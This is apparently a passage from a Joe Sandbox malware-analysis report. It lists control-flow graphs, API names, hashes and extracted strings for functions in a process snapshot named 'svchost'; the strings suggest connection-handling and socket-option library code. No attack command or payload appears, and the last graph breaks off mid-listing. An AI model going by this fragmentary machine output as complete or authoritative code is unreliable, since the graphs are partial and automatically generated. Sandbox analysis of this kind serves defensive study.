                                                                                            control_flow_graph 988 7ffda3732b20-7ffda3732b78 calloc 989 7ffda3732b7e-7ffda3732c06 memset malloc 988->989 990 7ffda3732cd5-7ffda3732cde _errno 988->990 992 7ffda3732c4d-7ffda3732c58 989->992 993 7ffda3732c08-7ffda3732c31 InitializeCriticalSectionEx call 7ffda3776b40 989->993 991 7ffda3732ce0-7ffda3732d0a call 7ffda3795780 990->991 996 7ffda3732c6b-7ffda3732c72 992->996 997 7ffda3732c5a-7ffda3732c60 closesocket 992->997 1002 7ffda3732c37-7ffda3732c42 993->1002 1003 7ffda3732d0b-7ffda3732d25 _strdup 993->1003 1000 7ffda3732c84-7ffda3732c9b free 996->1000 1001 7ffda3732c74-7ffda3732c7e DeleteCriticalSection free 996->1001 997->996 1004 7ffda3732c9d call 7ffda373fc60 1000->1004 1005 7ffda3732ca2-7ffda3732cad 1000->1005 1001->1000 1002->992 1003->992 1006 7ffda3732d2b-7ffda3732d4b free _strdup 1003->1006 1004->1005 1008 7ffda3732caf closesocket 1005->1008 1009 7ffda3732cb5-7ffda3732ccf memset free 1005->1009 1010 7ffda3732d51-7ffda3732d5f 1006->1010 1011 7ffda3732e3b-7ffda3732e45 1006->1011 1008->1009 1009->990 1014 7ffda3732d65-7ffda3732d6c 1010->1014 1015 7ffda3732f06-7ffda3732f1c call 7ffda3742f10 1010->1015 1012 7ffda3732fa4-7ffda3732fbf free 1011->1012 1013 7ffda3732e4b-7ffda3732e88 EnterCriticalSection LeaveCriticalSection 1011->1013 1012->990 1016 7ffda3732e8e-7ffda3732e91 1013->1016 1017 7ffda3732f41-7ffda3732f44 1013->1017 1014->1015 1018 7ffda3732d72-7ffda3732d79 1014->1018 1028 7ffda3732eff-7ffda3732f01 1015->1028 1029 7ffda3732f1e-7ffda3732f31 _errno 1015->1029 1020 7ffda3732e97-7ffda3732ea0 CloseHandle 1016->1020 1021 7ffda3732f36-7ffda3732f3f CloseHandle 1016->1021 1024 7ffda3732f67-7ffda3732f70 1017->1024 1025 7ffda3732f46-7ffda3732f61 GetAddrInfoExCancel WaitForSingleObject CloseHandle 1017->1025 1018->1015 1022 7ffda3732d7f-7ffda3732d86 1018->1022 1026 7ffda3732f8d-7ffda3732fa1 call 7ffda3764360 closesocket 1020->1026 1021->1026 1022->1015 1027 7ffda3732d8c-7ffda3732db8 MultiByteToWideChar 1022->1027 1030 7ffda3732f72 call 7ffda3742f60 1024->1030 1031 7ffda3732f77-7ffda3732f87 call 7ffda3732980 free 1024->1031 1025->1024 1026->1012 1027->1015 1035 7ffda3732dbe-7ffda3732de9 MultiByteToWideChar 1027->1035 1028->991 1029->1011 1030->1031 1031->1026 1035->1015 1038 7ffda3732def-7ffda3732e2f call 7ffda37333f0 CreateEventW 1035->1038 1041 7ffda3732e31 1038->1041 1042 7ffda3732ea5-7ffda3732ef1 GetAddrInfoExW 1038->1042 1041->1011 1042->1028 1043 7ffda3732ef3-7ffda3732efa call 7ffda3732fd0 1042->1043 1043->1028
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$CriticalSection$CloseHandleclosesocket$AddrByteCharInfoMultiWide_errno_strdupmemset$CancelCreateDeleteEnterEventInitializeLeaveObjectSingleWaitcallocmallocsocketswprintf_s
                                                                                            • String ID:
                                                                                            • API String ID: 416132278-0
                                                                                            • Opcode ID: b754e2acbba8f62ce28666c0b1cd78244c23c721d766d0c8adfa948de88007ba
                                                                                            • Instruction ID: e5e759b752038a15952c99d90740afee588a2ec65688da9b42be74c008c124f2
                                                                                            • Opcode Fuzzy Hash: b754e2acbba8f62ce28666c0b1cd78244c23c721d766d0c8adfa948de88007ba
                                                                                            • Instruction Fuzzy Hash: 05C1B23270AB8282E7589F21E46436973A2FF44B64F548235DA6E177E2DF3EE854C314
                                                                                            Function 00007FFDA3782780 Relevance: 46.1, APIs: 14, Strings: 12, Instructions: 565COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1045 7ffda3782780-7ffda37827ef call 7ffda37645e0 call 7ffda3764600 1050 7ffda37827f1-7ffda37827f6 1045->1050 1051 7ffda37827fb-7ffda3782809 call 7ffda3782360 1045->1051 1052 7ffda3783010 1050->1052 1056 7ffda378280b-7ffda3782810 1051->1056 1057 7ffda3782815-7ffda3782828 call 7ffda3784530 1051->1057 1055 7ffda3783012-7ffda3783039 call 7ffda3795780 1052->1055 1056->1052 1057->1052 1062 7ffda378282e-7ffda3782838 1057->1062 1063 7ffda378284c-7ffda3782856 1062->1063 1064 7ffda378283a-7ffda378284a _strdup 1062->1064 1065 7ffda378286a-7ffda3782874 1063->1065 1066 7ffda3782858-7ffda3782868 _strdup 1063->1066 1064->1056 1064->1063 1067 7ffda3782876-7ffda3782886 _strdup 1065->1067 1068 7ffda3782895-7ffda37828a4 call 7ffda3783180 1065->1068 1066->1056 1066->1065 1067->1056 1070 7ffda3782888-7ffda378288f 1067->1070 1068->1052 1072 7ffda37828aa-7ffda37828b8 1068->1072 1070->1068 1073 7ffda37828ca-7ffda37828d4 1072->1073 1074 7ffda37828ba-7ffda37828c1 1072->1074 1076 7ffda378291f-7ffda378292e call 7ffda3783820 1073->1076 1077 7ffda37828d6-7ffda37828dd 1073->1077 1074->1073 1075 7ffda37828c3 1074->1075 1075->1073 1076->1052 1083 7ffda3782934-7ffda3782952 1076->1083 1077->1076 1078 7ffda37828df-7ffda3782919 call 7ffda3761920 call 7ffda3785ef0 1077->1078 1078->1056 1078->1076 1084 7ffda3782954-7ffda378295b 1083->1084 1085 7ffda378295d-7ffda3782964 1083->1085 1084->1085 1087 7ffda3782967-7ffda378296e 1084->1087 1085->1087 1089 7ffda3782970-7ffda3782980 _strdup 1087->1089 1090 7ffda3782986-7ffda378298d 1087->1090 1089->1056 1089->1090 1091 7ffda378298f-7ffda37829ac _strdup 1090->1091 1092 7ffda37829ae-7ffda37829b0 1090->1092 1091->1092 1092->1052 1093 7ffda37829b6-7ffda37829cc call 7ffda3783ce0 1092->1093 1093->1052 1096 7ffda37829d2-7ffda37829d9 1093->1096 1097 7ffda37829ef-7ffda37829f6 1096->1097 1098 7ffda37829db-7ffda37829e9 call 7ffda375b920 1096->1098 1100 7ffda3782a0c-7ffda3782a13 1097->1100 1101 7ffda37829f8-7ffda3782a06 call 7ffda375b920 1097->1101 1098->1055 1098->1097 1103 7ffda3782a4a-7ffda3782a53 1100->1103 1104 7ffda3782a15-7ffda3782a20 call 7ffda375b920 1100->1104 1101->1055 1101->1100 1108 7ffda3782a6c-7ffda3782a73 1103->1108 1109 7ffda3782a55-7ffda3782a61 1103->1109 1104->1055 1116 7ffda3782a26-7ffda3782a2d 1104->1116 1112 7ffda3782a79-7ffda3782a80 1108->1112 1113 7ffda3782a75-7ffda3782a77 1108->1113 1109->1108 1111 7ffda3782a63-7ffda3782a6a 1109->1111 1111->1108 1114 7ffda3782a89-7ffda3782a97 1112->1114 1115 7ffda3782a82 1112->1115 1113->1112 1113->1114 1117 7ffda3782ab3-7ffda3782aba 1114->1117 1118 7ffda3782a99-7ffda3782aa6 1114->1118 1115->1114 1116->1103 1119 7ffda3782a2f-7ffda3782a41 call 7ffda3779870 1116->1119 1120 7ffda3782abc-7ffda3782ac2 1117->1120 1121 7ffda3782ac8-7ffda3782ad6 1117->1121 1118->1052 1128 7ffda3782aac 1118->1128 1119->1103 1129 7ffda3782a43 1119->1129 1120->1121 1125 7ffda3782b70-7ffda3782bb3 call 7ffda3790650 1121->1125 1126 7ffda3782adc-7ffda3782b00 call 7ffda373b5f0 1121->1126 1125->1052 1133 7ffda3782bb9-7ffda3782bd6 call 7ffda377f210 1125->1133 1137 7ffda3782b02-7ffda3782b19 call 7ffda3763f60 call 7ffda3739bc0 1126->1137 1138 7ffda3782b60-7ffda3782b6b call 7ffda3781a70 1126->1138 1128->1117 1129->1103 1140 7ffda3782beb-7ffda3782c1b call 7ffda377f2a0 1133->1140 1141 7ffda3782bd8-7ffda3782be6 call 7ffda37732e0 1133->1141 1137->1052 1152 7ffda3782b1f-7ffda3782b2e call 7ffda3784fd0 1137->1152 1138->1052 1150 7ffda3782c1d-7ffda3782c25 call 7ffda3773320 1140->1150 1151 7ffda3782c2a-7ffda3782c33 1140->1151 1141->1140 1150->1151 1154 7ffda3782cec-7ffda3782cfb 1151->1154 1155 7ffda3782c39-7ffda3782c60 call 7ffda373a3c0 1151->1155 1169 7ffda3782b44-7ffda3782b5b call 7ffda37803a0 1152->1169 1170 7ffda3782b30-7ffda3782b3f 1152->1170 1158 7ffda3782cfd-7ffda3782d04 1154->1158 1159 7ffda3782d0a-7ffda3782d11 1154->1159 1164 7ffda3782c62-7ffda3782c66 1155->1164 1165 7ffda3782caf-7ffda3782cb6 1155->1165 1158->1159 1160 7ffda3782f4e-7ffda3782f5f 1158->1160 1159->1160 1161 7ffda3782d17-7ffda3782d38 call 7ffda3780810 1159->1161 1167 7ffda3782f71-7ffda3782f74 1160->1167 1168 7ffda3782f61-7ffda3782f68 1160->1168 1180 7ffda3782d3e-7ffda3782d4b 1161->1180 1181 7ffda3782f48 1161->1181 1171 7ffda3782c70-7ffda3782cad call 7ffda373a530 call 7ffda3781670 call 7ffda373a3c0 1164->1171 1176 7ffda3782ccb-7ffda3782cdd 1165->1176 1177 7ffda3782cb8-7ffda3782cc6 call 7ffda37732e0 1165->1177 1174 7ffda3782fed-7ffda378300b call 7ffda3743190 call 7ffda37825e0 1167->1174 1175 7ffda3782f76-7ffda3782f8b call 7ffda373a2b0 1167->1175 1168->1167 1173 7ffda3782f6a 1168->1173 1169->1138 1170->1052 1171->1165 1173->1167 1174->1052 1197 7ffda3782f91-7ffda3782f94 1175->1197 1198 7ffda378303a-7ffda3783042 1175->1198 1176->1154 1186 7ffda3782cdf-7ffda3782ce7 call 7ffda3773320 1176->1186 1177->1176 1188 7ffda3782d9f-7ffda3782dae 1180->1188 1189 7ffda3782d4d-7ffda3782d98 free * 2 1180->1189 1181->1160 1186->1154 1194 7ffda3782db4-7ffda3782e51 free * 4 1188->1194 1195 7ffda3782e58-7ffda3782ef6 free * 3 call 7ffda37825e0 1188->1195 1189->1188 1194->1195 1213 7ffda3782f01-7ffda3782f09 1195->1213 1214 7ffda3782ef8-7ffda3782eff 1195->1214 1197->1198 1204 7ffda3782f9a-7ffda3782f9e 1197->1204 1199 7ffda3783044-7ffda378304c call 7ffda3773320 1198->1199 1200 7ffda3783051-7ffda3783054 1198->1200 1199->1200 1206 7ffda3783082-7ffda3783091 call 7ffda37904b0 1200->1206 1207 7ffda3783056-7ffda3783061 call 7ffda373a870 1200->1207 1204->1198 1210 7ffda3782fa4-7ffda3782fba call 7ffda373a060 1204->1210 1206->1052 1225 7ffda3783097-7ffda37830ae call 7ffda3763f60 call 7ffda3739bc0 1206->1225 1207->1206 1224 7ffda3783063-7ffda3783071 call 7ffda373a130 1207->1224 1226 7ffda3782fbc-7ffda3782fc4 call 7ffda3773320 1210->1226 1227 7ffda3782fc9-7ffda3782fcf 1210->1227 1219 7ffda3782f14 1213->1219 1220 7ffda3782f0b-7ffda3782f12 1213->1220 1218 7ffda3782f18-7ffda3782f43 call 7ffda3743190 1214->1218 1235 7ffda378310f-7ffda3783126 call 7ffda3781a70 call 7ffda3784fd0 1218->1235 1219->1218 1220->1218 1241 7ffda378314b-7ffda3783157 call 7ffda3743190 1224->1241 1242 7ffda3783077-7ffda378307d call 7ffda3781670 1224->1242 1225->1052 1249 7ffda37830b4-7ffda37830bb 1225->1249 1226->1227 1231 7ffda3782fd1-7ffda3782fdc call 7ffda3781670 1227->1231 1232 7ffda3782fde-7ffda3782fe8 call 7ffda3743190 1227->1232 1231->1200 1232->1174 1235->1052 1254 7ffda378312c-7ffda3783137 1235->1254 1241->1174 1242->1206 1252 7ffda37830e1-7ffda37830e8 1249->1252 1253 7ffda37830bd-7ffda37830c3 1249->1253 1252->1235 1256 7ffda37830ea-7ffda37830f1 1252->1256 1253->1252 1255 7ffda37830c5-7ffda37830da call 7ffda3743190 1253->1255 1257 7ffda378315c-7ffda3783162 call 7ffda3784cc0 1254->1257 1258 7ffda3783139-7ffda3783146 call 7ffda37394c0 1254->1258 1255->1252 1256->1235 1260 7ffda37830f3-7ffda3783108 call 7ffda3743190 1256->1260 1266 7ffda3783167-7ffda378316b 1257->1266 1258->1052 1260->1235 1266->1052 1268 7ffda3783171-7ffda378317b call 7ffda37394c0 1266->1268 1268->1052
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ($($NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                                                                                            • API String ID: 0-3942307397
                                                                                            • Opcode ID: 1733cf3c4f71a555df5f6a50032d9b8bb588882759e49a2dea7c43c5f06a7732
                                                                                            • Instruction ID: c7a84f37bf8156692f9c2fc8b70b53308354d19894e3fa25bfa35c882315970e
                                                                                            • Opcode Fuzzy Hash: 1733cf3c4f71a555df5f6a50032d9b8bb588882759e49a2dea7c43c5f06a7732
                                                                                            • Instruction Fuzzy Hash: 46429521B0AB8297EB598F25A5203B97396FF45785F084135DE8E67792DF3EE890C304
                                                                                            Function 00007FFDA3737EE0 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 292networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1395 7ffda3737ee0-7ffda3737f43 call 7ffda377f210 call 7ffda3738740 1400 7ffda3737fb5-7ffda3737fbc 1395->1400 1401 7ffda3737f45-7ffda3737f65 call 7ffda373b240 1395->1401 1402 7ffda3738374-7ffda37383b3 call 7ffda37432a0 call 7ffda3795780 1400->1402 1403 7ffda3737fc2-7ffda3737fc9 1400->1403 1413 7ffda3737f6b-7ffda3737fb0 _errno * 3 call 7ffda377a280 call 7ffda37430a0 1401->1413 1414 7ffda3738009-7ffda3738017 1401->1414 1405 7ffda3737fcf-7ffda3737fda 1403->1405 1406 7ffda3738364-7ffda3738367 closesocket 1403->1406 1410 7ffda373835f call 7ffda3764360 1405->1410 1411 7ffda3737fe0-7ffda3738004 call 7ffda3764360 call 7ffda3764960 * 2 1405->1411 1409 7ffda373836d 1406->1409 1409->1402 1410->1406 1411->1409 1413->1400 1419 7ffda3738047 1414->1419 1420 7ffda3738019-7ffda3738045 setsockopt 1414->1420 1421 7ffda373804e-7ffda373806a call 7ffda3743190 1419->1421 1420->1421 1431 7ffda3738071-7ffda3738075 1421->1431 1432 7ffda373806c-7ffda373806f 1421->1432 1433 7ffda37380da 1431->1433 1434 7ffda3738077-7ffda3738080 1431->1434 1432->1431 1432->1433 1436 7ffda37380dd-7ffda3738100 1433->1436 1434->1436 1437 7ffda3738082-7ffda37380ad setsockopt 1434->1437 1441 7ffda3738102-7ffda3738121 call 7ffda3787db0 1436->1441 1442 7ffda373813b-7ffda373813e 1436->1442 1437->1436 1439 7ffda37380af-7ffda37380d8 WSAGetLastError call 7ffda377a280 call 7ffda3743190 1437->1439 1439->1436 1453 7ffda373812f-7ffda3738139 1441->1453 1454 7ffda3738123-7ffda373812d 1441->1454 1443 7ffda3738140-7ffda3738165 getsockopt 1442->1443 1444 7ffda3738192-7ffda373819d 1442->1444 1448 7ffda3738171-7ffda373818c setsockopt 1443->1448 1449 7ffda3738167-7ffda373816f 1443->1449 1450 7ffda3738283-7ffda373828b 1444->1450 1451 7ffda37381a3-7ffda37381aa 1444->1451 1448->1444 1449->1444 1449->1448 1455 7ffda373828d-7ffda37382bb call 7ffda3764960 * 2 1450->1455 1456 7ffda37382d1 1450->1456 1451->1450 1457 7ffda37381b0-7ffda37381de setsockopt 1451->1457 1453->1443 1454->1444 1486 7ffda37382bd-7ffda37382c0 1455->1486 1487 7ffda37382c2-7ffda37382c5 1455->1487 1463 7ffda37382d4-7ffda37382da 1456->1463 1460 7ffda37381e0-7ffda37381ed WSAGetLastError 1457->1460 1461 7ffda37381f2-7ffda3738266 call 7ffda3788020 * 2 WSAIoctl 1457->1461 1467 7ffda3738275-7ffda373827e call 7ffda3743190 1460->1467 1461->1450 1481 7ffda3738268-7ffda373826e WSAGetLastError 1461->1481 1464 7ffda37382e1-7ffda3738305 call 7ffda375b960 call 7ffda37378b0 1463->1464 1465 7ffda37382dc-7ffda37382df 1463->1465 1469 7ffda373831a-7ffda3738337 call 7ffda3768960 1464->1469 1485 7ffda3738307-7ffda373830a 1464->1485 1465->1464 1465->1469 1467->1450 1469->1402 1484 7ffda3738339-7ffda373835d call 7ffda37384b0 call 7ffda377f210 1469->1484 1481->1467 1484->1402 1485->1400 1489 7ffda3738310-7ffda3738315 1485->1489 1486->1463 1487->1456 1490 7ffda37382c7-7ffda37382cc 1487->1490 1489->1400 1490->1400
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errnosetsockopt$CounterIoctlPerformanceQueryclosesocketgetsockopthtonsinet_ntop
                                                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %qd: errno %d$Failed to set SO_KEEPALIVE on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                                                                                            • API String ID: 2614696814-935189632
                                                                                            • Opcode ID: 7b22c27c6eaf712f2131df2c9eab57348eab0c49bcdbf157eae59c86ed5bb559
                                                                                            • Instruction ID: 68707959e66b35883f6f345dba716f509e4eff32354f1113891c9c523e6a518d
                                                                                            • Opcode Fuzzy Hash: 7b22c27c6eaf712f2131df2c9eab57348eab0c49bcdbf157eae59c86ed5bb559
                                                                                            • Instruction Fuzzy Hash: FAD1D132B0978292EB58CB21E4643BE7362FB49B84F104135EA5D67796DF7EE148C708
                                                                                            Function 00007FFDA36F59C0 Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 146COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1494 7ffda36f59c0-7ffda36f59ef GetFileAttributesA 1495 7ffda36f5a0a-7ffda36f5a0e 1494->1495 1496 7ffda36f59f1-7ffda36f5a05 GetLastError call 7ffda36f5dc0 1494->1496 1498 7ffda36f5a28-7ffda36f5a6c CreateFileA 1495->1498 1499 7ffda36f5a10-7ffda36f5a23 _errno 1495->1499 1501 7ffda36f5c10-7ffda36f5c2a call 7ffda36f6230 1496->1501 1502 7ffda36f5a83-7ffda36f5aba DeviceIoControl 1498->1502 1503 7ffda36f5a6e-7ffda36f5a7e GetLastError call 7ffda36f5dc0 1498->1503 1499->1501 1504 7ffda36f5b52-7ffda36f5b63 CloseHandle 1502->1504 1505 7ffda36f5ac0-7ffda36f5b34 _errno GetLastError FormatMessageA libintl_gettext __acrt_iob_func call 7ffda36f1ab0 LocalFree CloseHandle 1502->1505 1513 7ffda36f5c00-7ffda36f5c08 1503->1513 1510 7ffda36f5b3a-7ffda36f5b4d _errno 1504->1510 1511 7ffda36f5b65-7ffda36f5b95 WideCharToMultiByte 1504->1511 1505->1510 1510->1513 1515 7ffda36f5ba7-7ffda36f5bac 1511->1515 1516 7ffda36f5b97-7ffda36f5ba5 _errno 1511->1516 1513->1501 1517 7ffda36f5bfe 1515->1517 1518 7ffda36f5bae-7ffda36f5bb1 1515->1518 1516->1513 1517->1513 1518->1517 1519 7ffda36f5bb3-7ffda36f5bb7 1518->1519 1519->1517 1520 7ffda36f5bb9-7ffda36f5bbd 1519->1520 1520->1517 1521 7ffda36f5bbf-7ffda36f5bc3 1520->1521 1521->1517 1522 7ffda36f5bc5-7ffda36f5bd1 isalpha 1521->1522 1522->1517 1523 7ffda36f5bd3-7ffda36f5bd7 1522->1523 1523->1517 1524 7ffda36f5bd9-7ffda36f5bdd 1523->1524 1524->1517 1525 7ffda36f5bdf 1524->1525 1526 7ffda36f5be0-7ffda36f5be9 1525->1526 1526->1526 1527 7ffda36f5beb-7ffda36f5bfb memcpy 1526->1527 1527->1517
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$AttributesErrorFileLast
                                                                                            • String ID: could not get junction for "%s": %s
                                                                                            • API String ID: 3917093391-640641469
                                                                                            • Opcode ID: b275945d134fbdca25bfaa522fef7c4b1b215dbe53b10296cbeeaebf84d4fd8f
                                                                                            • Instruction ID: 0a93418cdfc7fe2fa14ee760e28039638280345b44476d0375c2449d9cab4e7a
                                                                                            • Opcode Fuzzy Hash: b275945d134fbdca25bfaa522fef7c4b1b215dbe53b10296cbeeaebf84d4fd8f
                                                                                            • Instruction Fuzzy Hash: 22619721B0FB8246F7609B20A96436967A2FB45774F486334DA6D23BD6CF3ED8148708
                                                                                            Function 00007FFDA3751AC0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 345COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1791 7ffda3751ac0-7ffda3751b0c 1792 7ffda3751b10-7ffda3751b17 1791->1792 1792->1792 1793 7ffda3751b19-7ffda3751b25 1792->1793 1794 7ffda3751b67-7ffda3751b83 1793->1794 1795 7ffda3751b27-7ffda3751b3d call 7ffda3779870 1793->1795 1797 7ffda3751b95-7ffda3751baa call 7ffda3752190 1794->1797 1798 7ffda3751b85-7ffda3751b90 call 7ffda37732e0 1794->1798 1803 7ffda3751b53-7ffda3751b62 call 7ffda37430a0 1795->1803 1804 7ffda3751b3f-7ffda3751b51 call 7ffda3779870 1795->1804 1805 7ffda3751bac-7ffda3751bc5 call 7ffda3743190 1797->1805 1806 7ffda3751bc8-7ffda3751bcf 1797->1806 1798->1797 1818 7ffda3751fec 1803->1818 1804->1794 1804->1803 1805->1806 1810 7ffda3751bd1-7ffda3751bd9 call 7ffda3773320 1806->1810 1811 7ffda3751bde-7ffda3751be2 1806->1811 1810->1811 1816 7ffda3751fe1-7ffda3751fe9 1811->1816 1817 7ffda3751be8-7ffda3751bf2 1811->1817 1816->1818 1820 7ffda3751bf4-7ffda3751c22 call 7ffda3764960 * 2 1817->1820 1821 7ffda3751c28-7ffda3751c3e inet_pton 1817->1821 1819 7ffda3751fef-7ffda3752015 call 7ffda3795780 1818->1819 1820->1821 1839 7ffda3751fbe-7ffda3751fc3 1820->1839 1823 7ffda3751c40-7ffda3751c44 1821->1823 1824 7ffda3751c46-7ffda3751c5c inet_pton 1821->1824 1827 7ffda3751c66-7ffda3751c79 call 7ffda373fe40 1823->1827 1828 7ffda3751c62 1824->1828 1829 7ffda3751ce7-7ffda3751cef 1824->1829 1827->1839 1840 7ffda3751c7f-7ffda3751c87 1827->1840 1828->1827 1832 7ffda3751cf1-7ffda3751cff 1829->1832 1833 7ffda3751d30-7ffda3751d41 call 7ffda3779870 1829->1833 1835 7ffda3751d01-7ffda3751d16 call 7ffda3751460 1832->1835 1836 7ffda3751d1c-7ffda3751d2a 1832->1836 1848 7ffda3751dd7-7ffda3751dde 1833->1848 1849 7ffda3751d47-7ffda3751d4e 1833->1849 1835->1836 1836->1833 1836->1839 1839->1819 1845 7ffda3751c89-7ffda3751c97 call 7ffda37732e0 1840->1845 1846 7ffda3751c9c-7ffda3751cbe call 7ffda3750ee0 1840->1846 1845->1846 1861 7ffda3751cd1-7ffda3751cd4 1846->1861 1862 7ffda3751cc0-7ffda3751ccd call 7ffda3773320 1846->1862 1850 7ffda3751de0-7ffda3751de9 1848->1850 1853 7ffda3751d50-7ffda3751d57 1849->1853 1850->1850 1854 7ffda3751deb-7ffda3751e22 htons inet_pton 1850->1854 1853->1853 1855 7ffda3751d59-7ffda3751d5d 1853->1855 1859 7ffda3751e24-7ffda3751e27 1854->1859 1860 7ffda3751e2c-7ffda3751e47 calloc 1854->1860 1857 7ffda3751d5f-7ffda3751d7a call 7ffda37798e0 1855->1857 1858 7ffda3751d7c-7ffda3751d7f 1855->1858 1857->1848 1857->1858 1867 7ffda3751d81-7ffda3751d88 1858->1867 1868 7ffda3751da7-7ffda3751db4 call 7ffda3752630 1858->1868 1863 7ffda3751f7a-7ffda3751f7d 1859->1863 1869 7ffda3751e51-7ffda3751e8a 1860->1869 1870 7ffda3751e49-7ffda3751e4c 1860->1870 1865 7ffda3751fd3-7ffda3751fdc call 7ffda37523f0 1861->1865 1866 7ffda3751cda-7ffda3751ce2 call 7ffda373fc60 1861->1866 1862->1861 1863->1840 1872 7ffda3751f83-7ffda3751f86 1863->1872 1865->1816 1866->1816 1867->1868 1876 7ffda3751d8a-7ffda3751da2 call 7ffda3744170 1867->1876 1868->1839 1889 7ffda3751dba-7ffda3751dc7 call 7ffda3750ed0 1868->1889 1877 7ffda3751e90-7ffda3751e9f 1869->1877 1870->1863 1872->1816 1880 7ffda3751f88-7ffda3751f99 1872->1880 1876->1863 1877->1877 1883 7ffda3751ea1-7ffda3751ea8 1877->1883 1885 7ffda3751fa2 call 7ffda3732580 1880->1885 1886 7ffda3751f9b-7ffda3751fa0 call 7ffda3744310 1880->1886 1888 7ffda3751eb0-7ffda3751eb7 1883->1888 1895 7ffda3751fa7-7ffda3751fb0 1885->1895 1886->1895 1888->1888 1892 7ffda3751eb9-7ffda3751ece calloc 1888->1892 1898 7ffda3751dcc-7ffda3751dd2 1889->1898 1896 7ffda3751ed4-7ffda3751f08 htons inet_pton 1892->1896 1897 7ffda3751f77 1892->1897 1899 7ffda3751fb2-7ffda3751fb5 call 7ffda37523f0 1895->1899 1900 7ffda3751fba-7ffda3751fbc 1895->1900 1896->1897 1901 7ffda3751f0a-7ffda3751f5c 1896->1901 